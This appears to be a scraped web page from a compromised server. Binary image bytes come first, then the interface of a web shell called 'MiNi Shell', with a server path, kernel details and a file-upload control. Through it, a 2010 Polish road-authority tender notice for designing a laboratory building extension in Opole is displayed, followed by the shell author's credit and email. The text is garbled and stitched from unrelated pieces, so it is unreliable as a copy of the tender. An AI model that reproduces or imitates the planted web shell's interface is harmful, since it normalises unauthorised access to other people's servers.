JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/13244-N-2010.html

<p class="kh_header"><b>Opole: Opracowanie  projektu budowlanego i wykonawczego dla zadania :
 -Rozbudowa  istniejącego   budynku laboratorium drogowego i punktu zarządzania autostradą GDDKiA O/Opole ul. Żerkowicka 1c w Opolu -
podstawie koncepcji architektonicznej</b><br>
<b>Numer ogłoszenia: 13244 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział  w Opolu , ul. Niedziałkowskiego 6, 45-085 Opole, woj. opolskie, tel. 077 4016344; 4545505, 4016330, faks 077 4544468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opole.gddkia.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie  projektu budowlanego i wykonawczego dla zadania :
 -Rozbudowa  istniejącego   budynku laboratorium drogowego i punktu zarządzania autostradą GDDKiA O/Opole ul. Żerkowicka 1c w Opolu -
podstawie koncepcji architektonicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejsze opracowanie obejmuje : 
 Opracowanie, na podstawie dostarczonej przez zamawiającego koncepcji architektonicznej, projektu budowlanego, projektów wykonawczych oraz wszelkich innych dokumentacji wymaganych niniejsza SIWZ dla zadania pn. Rozbudowa istniejącego budynku laboratorium drogowego i punktu zarządzania autostradą Generalnej Dyrekcji Dróg Krajowych i Autostrad Oddział w Opolu, na terenie działki nr 1146/75 karta mapy 12 obręb Bierkowice, ul. Żerkowicka 1c w Opolu, wraz z uzyskaniem decyzji pozwolenia na budowę. 

1.	Należy wykonać kompleksowe opracowania projektowe, po dokonaniu inwentaryzacji budynku istniejącego,  na rozbudowę istniejącego laboratorium drogowego, w którym wykonuje się badania fizyko-chemiczne związane z budową dróg i obiektów drogowych, punktu zarządzania autostradą oraz archiwum.
2.	Przedmiot zamówienia obejmuje wykonanie  projektów budowlanych  i  wykonawczych wraz ze specyfikacjami technicznego odbioru robót, przedmiarami robót, opracowaniem kosztorysów inwestorskich  i uzyskaniem pozwolenia na budowę .
3.	Do istniejącego parterowego budynku (pawilon typu Namysłów) o powierzchni zabudowy ok. 630m2 i kubaturze 2300m3, po wyburzeniu jego części, dobudowany zostanie, połączony z nim architektonicznie, technologicznie i funkcjonalnie, budynek dwukondygnacyjny, pow. zabudowy  ok. 482m2, pow. użytkowej ok. 623m2 i kubaturze ok. 2765,8 m3 oraz sąsiadujący budynek magazynowo-garażowy. Wybudowane zostaną nowe boksy na odpady komunalne wraz z boksem na odpady laboratoryjne.  Wybudowany zostanie parking dla samochodów i  komunikacja wewnętrzna. Zaprojektowane i wykonane zostanie nowe ogrodzenie. 
4.	Docelowo w budynku w części istniejącej i dobudowanej będzie pracowało ok. 35 osób. W części laboratoryjnej 20, w punkcie zarządzania autostradą i archiwum pozostałe. 
5.	Zakres projektów instalacji:
a.	Woda i kanalizacja (zamawiający posiada projekt przyłącza wodnego, należy go dostosować i ewentualnie zaprojektować nowy lub dodatkowy zbiornik na nieczystości ciekłe)
b.	Energia elektryczna - zasilanie i instalacje wewnętrzne 230/ 400 V oraz 24V na wybranych stanowiskach laboratoryjnych wg uzgodnień,
c.	Oświetlenie, w tym oświetlenie zewnętrzne oraz ewakuacyjne wewnątrz,
d.	Instalacje sygnalizacyjne, antywłamaniowe i sygnalizacji pożaru,
e.	Instalacje strukturalnej sieci komputerowej,
f.	Instalacja podtrzymania napięcia sieci komputerowej UPS,
g.	Instalacje telefoniczne,
h.	Instalacja RTV,
i.	Instalacja monitoringu TV,
j.	Instalacja radiowa (łączność CB),
k.	Wentylacja, w tym wentylacja stanowiskowa w wybranych pomieszczeniach,
l.	Klimatyzacja, w wybranych pomieszczeniach, 
m.	Ogrzewanie (obecnie kotłownia  olejowa).
6.	Opracowanie należy wykonać na podstawie Projektu Koncepcji Architektonicznej i w oparciu o Decyzję Prezydenta Miasta Opola  o ustalaniu lokalizacji inwestycji celu publicznego, znak UAB.DM.7331-155/09 z dnia 15.06.2009r. , które stanowią  załącznik do SIWZ, oraz  w uzgodnieniach z zamawiającym. 
7.	Ilość dokumentacji 
a.	4 egz. projektu budowlanego (wszystkie branże)
b.	5 egz. projektu wykonawczego (wszystkie branże)
c.	2 egz. kosztorysu inwestorskiego
d.	2 egz. dokumentacja przetargowa służąca do opisu przedmiotu zamówienia (obmiary robót, przedmiary robót, zestawienia materiałów, Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych, kosztorys ofertowy).
e.	1 egz. wersji elektronicznej opracowanych materiałów, 
f.	Pozwolenie na budowę (decyzja administracyjna)- 1 egz.
8.	Wykonawca, Projektant na etapie prac projektowych może dokonać zmian w stosunku do koncepcji architektonicznej załączonej do SIWZ. Jeżeli zajdzie taka konieczność może  zmienić np. sposób ogrzewania obiektu lub sposób odprowadzania ścieków itp. lub dokonać innych zmian, w tym architektonicznych,  by osiągnąć cel jakim jest zaprojektowanie budynku, który  spełni wysokie standardy użytkowe i funkcjonalne, charakteryzować się będzie niskim zużyciem energii, zapewni komfort i bezpieczeństwo pracy oraz odpowiednie, wynikające z przepisów prawa, warunki ochrony środowiska naturalnego.
9.	Ponadto po stronie Wykonawcy leży uzyskanie niezbędnych uzgodnień i decyzji oraz decyzji pozwolenia na budowę z upoważnienia i w imieniu zamawiającego. Wszelkie niezbędne materiały; mapy, wnioski, uzgodnienia, wymagane opinie i decyzje wykonawca uzyskuje własnym staraniem i na własny koszt.
a.	Projektant wykona także techniczne badania podłoża gruntu, opracuje ewentualne projekty przybudowy  infrastruktury kolidującej np. oświetlenie, sieć wodociągowa oraz   z upoważnienia zamawiającego dokona niezbędnych uzgodnień z dostawcami mediów  np. energia elektryczna, woda. 
7.	Dokumentacja musi zostać wykonana w sposób kompleksowy, zgodnie z umową, uzgodnieniami z zamawiającym, obowiązującymi przepisami techniczno-budowlanymi i być kompletna z punktu widzenia celu jakiemu ma służyć. Musi być wykonana w oparciu o aktualne warunki techniczne, obejmować wszystkie branże oraz zawierać wymagane przepisami prawa uzgodnienia i opinie. 
8.	Nadzór autorski nad realizacja projektu nie wchodzi w zakres niniejszego zamówienia .
       Na żądanie Zamawiającego nadzór autorski  świadczony będzie, w oparciu o odrębną umowę.  
       Przewidywana ilość wizyt na etapie realizacji inwestycji budowlanej - 10. 
9.	Pozostałe wymagania funkcjonalne opisano w załączonej koncepcji architektonicznej.
10.	Wykonawca przed złożeniem oferty powinien zapoznać się ze stanem faktycznym obiektu istniejącego. Termin wizji lokalnej należy uzgodnić z zamawiającym w dni robocze w godz. 8.15 -16.15. 

     Zadanie planowane jest do wykonania jako jednoetapowe. 
 
      W ramach dokumentacji projektowej  należy uwzględnić następujące branże :
   - budowlana ,
   - elektryczna ,
   - teletechniczna , 
   - wodno-kanalizacyjna 
   - cieplno-wentylacyjna ,
   - geodezyjna 
   - geologiczna.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości : 3.600,00 PLN (słownie złotych: trzy tysiące sześćset złotych 00/100). Wadium musi być wniesione przed upływem terminu składania ofert w następujących formach , w zależności od wyboru Wykonawcy : a. pieniądzu, przelewem na rachunek bankowy: w Banku Gospodarstwa Krajowego w Warszawie , Oddział w Opolu nr 46 1130 1219 0026 3102 9720 0005 Wadium wnoszone w pieniądzu powinno znaleźć się na koncie Zamawiającego do dnia i godziny składania ofert . b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem, pieniężnym ; c. gwarancjach bankowych; d. gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2007 Nr 42 poz.275 ).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WARUNKI UDZIAŁU W POSTĘPOWANIU I SPOSÓB DOKONYWANIA  OCENY ICH SPEŁNIENIA : 
1.W postępowaniu  mogą brać udział , Wykonawcy niepodlegający  wykluczeniu  na podstawie art. 24 ust. 1 ustawy Pzp 
oraz 
spełniający niżej określone warunki  udziału  w postępowaniu ;

2. Warunki udziału w postępowaniu  określone w oparciu o art. 22 ust. 1  ustawy Pzp ; 

2.1 ,,Wiedza  i  Doświadczenie,,  - 
Opis sposobu dokonywania oceny spełnienia tego warunku : 
Wykonawca musi wykazać, że zrealizował (zakończył) w okresie ostatnich    3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej  dwa  projekty budowlano-wykonawcze budowy lub przebudowy obiektu użyteczności publicznej lub obiektu przemysłowego ,  
w tym 
- co najmniej jeden ze stanowiskami pracy na których występują czynniki szkodliwe   ( fizyczne i chemiczne )
oraz 
- co najmniej jeden o powierzchni użytkowej  min. 1000 m2 . 

2.2  ,,Osoby zdolne do wykonania zamówienia,,  -  
Opis sposobu dokonywania oceny spełnienia tego warunku : 
Wykonawca musi mieć do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk jakie zostaną im powierzone .
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków .
W takiej sytuacji Wykonawca zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował osobami niezbędnymi do realizacji zamówienia , a w szczególności przedstawi w tym celu pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonywaniu zamówienia .

Wykonawca przedstawi w ofercie kandydatów  na każde stanowisko wymienione poniżej  ( ta sama osoba będzie mogła zajmować jednocześnie dwa stanowiska jeżeli będzie posiadała odpowiednie uprawnienia  ) .   

Wykonawca przedstawi w ofercie osoby posiadające : - stosowne uprawnienia projektowe  legitymujące się : - w przypadku osoby na stanowisko głównego projektanta w branży budowlanej  - conajmniej 10 letnim doświadczeniem od uzyskania uprawnień budowlanych bez ograniczeń  do projektowania ; w przypadku pozostałych osób : - conajmniej 5 letnim doświadczeniem od uzyskania uprawnień bez ograniczeń dla  branż :  elektryczna i elektroenergetyczna , telekomunikacyjna  , wodno-kanalizacyjna , cieplna i wentylacyjna oraz w przypadku pozostałych osób : - conajmniej 5 letnim doświadczeniem od uzyskania uprawnień branży  geodezyjnej , geologicznej  ) - po 1 osobie ; 
 
2.3. ,,Sytuacja ekonomiczna i finansowa ,, - 
Opis sposobu dokonywania oceny spełnienia tego warunku : 
Wykonawca musi wykazać:
-  posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia  na wartość co najmniej  200.000 zł lub  w innej walucie wg średniego kursu NBP z dnia poprzedzającego dzień składania  ofert ; 

3. Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia ( spółki cywilne/konsorcja ) -  
W przypadku tych Wykonawców, żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1  ustawy Pzp, natomiast warunki określone  w pkt. 2.1. , 2.2. i 2.3  muszą spełniać łącznie ;  
4.  Ocena spełniania warunków udziału w postępowaniu będzie dokonana  na zasadzie   spełnia - nie spełnia . Podstawą oceny spełniania  warunków udziału będą w  szczególności wymagane dokumenty i oświadczenia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> INFORMACJE O OŚWIADCZENIACH I  DOKUMENTACH , JAKIE MAJĄ
DOSTARCZYC WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA 
WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIE PODLEGANIA 
WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY PZP . 

1  W celu wykazania spełnienia przez  Wykonawcę warunków udziału w postępowaniu , określonych  w oparciu o art. 22 ust. 1   ustawy Pzp Wykonawcy powinni przedłożyć następujące dokumenty  (oryginały lub kserokopie poświadczone przez Wykonawcę za zgodność z oryginałem): 

1.1.  Oświadczenie o spełnianiu warunków udziału w postępowaniu  , zgodne z treścią  Formularza nr 3.1. ;

1.2.  Wykaz wykonanych ( zakończonych ) usług w zakresie niezbędnym do spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości , przedmiotu , dat wykonania i odbiorców na formularzu zgodnym z treścią Formularza  3.3  . Informacja musi potwierdzać spełnienie warunku ,,Wiedza i doświadczenie,, .
 Do informacji winny być dołączone dokumenty potwierdzające, że wymienione w informacji   usługi zostały wykonane należycie ;

1.3	Wykaz osób  , które będą uczestniczyć w wykonywaniu zamówienia , o których  mowa w warunku ,,Osoby zdolne do wykonania zamówienia,, , wraz z  informacjami na temat ich kwalifikacji  zawodowych , doświadczenia  i wykształcenia  niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich  czynności na Formularzu 3.4 ;  

1.4	Oświadczenie , że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia tzn. posiadają odpowiednie uprawnienia budowlane ( przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych  w budownictwie, o których mowa w ustawie Prawo budowlane i   przynależność do Krajowej Izby Inżynierów Budownictwa) ;

1.5. Jeżeli Wykonawca wskaże osoby  zdolne  do wykonania zamówienia innych podmiotów  niezależnie od charakteru prawnego łączącego go z nimi stosunków to w  takiej sytuacji  
 Wykonawca zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował  osobami niezbędnymi do realizacji zamówienia  , a w szczególności przedstawi w tym  celu:   pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji  niezbędnych osób na   okres korzystania z nich przy wykonywaniu zamówienia ;
 
1.6. Opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest   ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  
związanej z przedmiotem zamówienia  w wysokości , o której mowa w  warunku  ,,Sytuacja   ekonomiczna i finansowa,, ; 

2.	W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 Ustawy Pzp należy przedłożyć :
2.1 a)   Oświadczenie Wykonawcy / ów ( legitymujących się KRS-em ) o braku podstaw  do wykluczenia  w oparciu o  art. 24 ust.1  Ustawy Pzp na Formularzu 3.2.a 
lub
2.1. b) Oświadczenie Wykonawcy/ów  ( osoby fizyczne  legitymujące się np.  wpisem do ewidencji  działalności gospodarczej )  o braku podstaw do wykluczenia  na podstawie art.24  ust. 1 Ustawy Pzp ze szczególnym uwzględnieniem art. 24 ust. 1 pkt. 2-  Formularz 3.2 b ;  

2.2. Aktualny odpis z właściwego rejestru  jeżeli odrębne przepisy wymagają wpisu do rejestru  w  celu wykazania braku podstaw do wykluczenia w oparciu o art. 24ust. 1 pkt. 2 Ustawy    wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert., a w  
stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 Ustawy Pzp (  oświadczenie to  zawarte będzie w Formularzu 3.2 b ) ;

3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej   Polskiej, zamiast dokumentów, o których mowa  w pkt   2 składa  dokument lub dokumenty   określone w § 4 Rozporządzenia Prezesa Rady Ministrów  z  dnia 30 grudnia 2009 r w sprawie  rodzajów dokumentów , jakich może żądać  
zamawiający od wykonawcy , oraz form w jakich te  dokumenty mogą być składane ( Dz.  U. Nr 226 z 2009 r poz. 1817 ) ;
 
4.   W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w celu   potwierdzenia spełnienia warunków wymaganych od Wykonawców składających  wspólną   ofertę:
a)	oświadczenie wymienione w pkt 1.1. winno być złożone w imieniu wszystkich Wykonawców składających wspólną ofertę i podpisane przez ustanowionego  pełnomocnika do ich reprezentowania, 
b)	dokumenty wymienione w pkt 1.2 - 1.6  składa  w imieniu wszystkich ten, lub ci spośród Wykonawców składających wspólną   ofertę, którzy spełniają warunki udziału w postępowaniu  i uczestniczyć będą w  realizacji zamówienia w zakresie  odpowiadającym postawionym warunkom,
c)	oświadczenie wymienione w pkt 2.1.a  lub 2.1.b  winno być złożone  przez każdego Wykonawcę ,
d)	dokumenty wymienione w pkt 2.2. albo odpowiadające im określone w pkt 3.  winny być złożone przez każdego Wykonawcę; 
 
Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zwarcia umowy w sprawie niniejszego zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gddkia.gov.pl/article/oddzialy/gddkia_opole/ oraz www.gddkia.uxnet.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Opolu , ul. Niedziałkowskiego 6 , 45-085 Opole , pok. 307-308 ( Wydział zamówień publicznych ) - materiał bezpłatne..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 10:50, miejsce: siedziba Zamawiającego przy ul. Niedziałkowskiego 6 w Opolu , pok. nr 101 - sekretariat ( I piętro ). Otwarcie godz. 11:00 pok. 15...</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com